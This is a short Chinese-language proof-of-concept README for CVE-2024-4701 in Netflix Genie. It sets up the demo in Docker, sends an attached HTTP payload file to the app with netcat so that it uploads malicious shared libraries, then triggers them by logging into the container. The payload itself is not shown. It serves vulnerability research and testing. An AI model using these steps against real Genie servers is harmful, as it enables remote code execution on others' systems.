
CVE-2024-4701的POC
CVE-2024-4701 的 PoC
从 https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml 或此仓库下载 genie docker 文件
运行
docker-compose up
下载附带的 http 载荷文件 loadlib
运行以下命令
nc -w 5 localhost 8080 < loadlib
你可能需要安装 netcat ( nc )
这将向运行在 docker 中的 genie 应用发送载荷,该应用会上传 pe.so 和 ld.so.upload 文件。
然后登录到 genie-app docker 容器
docker exec -it genie_demo_app_4.3.0 /bin/bash
登录操作会触发恶意库的执行,因此只需接着运行
ls /tmp/
以查看写入磁盘的文件 command.out。